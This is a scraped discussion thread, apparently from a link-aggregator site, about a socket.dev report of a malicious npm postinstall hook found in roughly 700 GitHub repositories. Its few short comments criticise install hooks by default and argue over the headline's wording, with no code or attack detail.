Malicious Postinstall Hook Found in 700 GitHub Repos, Including Node Projects (opens in new tab)

(socket.dev)

18 points882542F3884314B3d ago4 comments

4 comments

Postinstall hooks are a footgun. The bad part here is that people reviewing a PHP package may not even look closely at package.json.

Title is somewhat misleading. "Node projects" mean projects using nodejs as opposed to projects under the Node.js org.

How many more examples of malware postinstall scripts do we need before Node quits running them by default, without warning?

All Composer packages (but the malicious part is in the node dependency)

Effected*

> Use effect as a noun to refer to a change resulting from something.

j / k navigate · click thread line to collapse

Postinstall hooks are a footgun. The bad part here is that people reviewing a PHP package may not even look closely at package.json.

Title is somewhat misleading. "Node projects" mean projects using nodejs as opposed to projects under the Node.js org.

How many more examples of malware postinstall scripts do we need before Node quits running them by default, without warning?

All Composer packages (but the malicious part is in the node dependency)

Effected*

> Use effect as a noun to refer to a change resulting from something.

j / k navigate · click thread line to collapse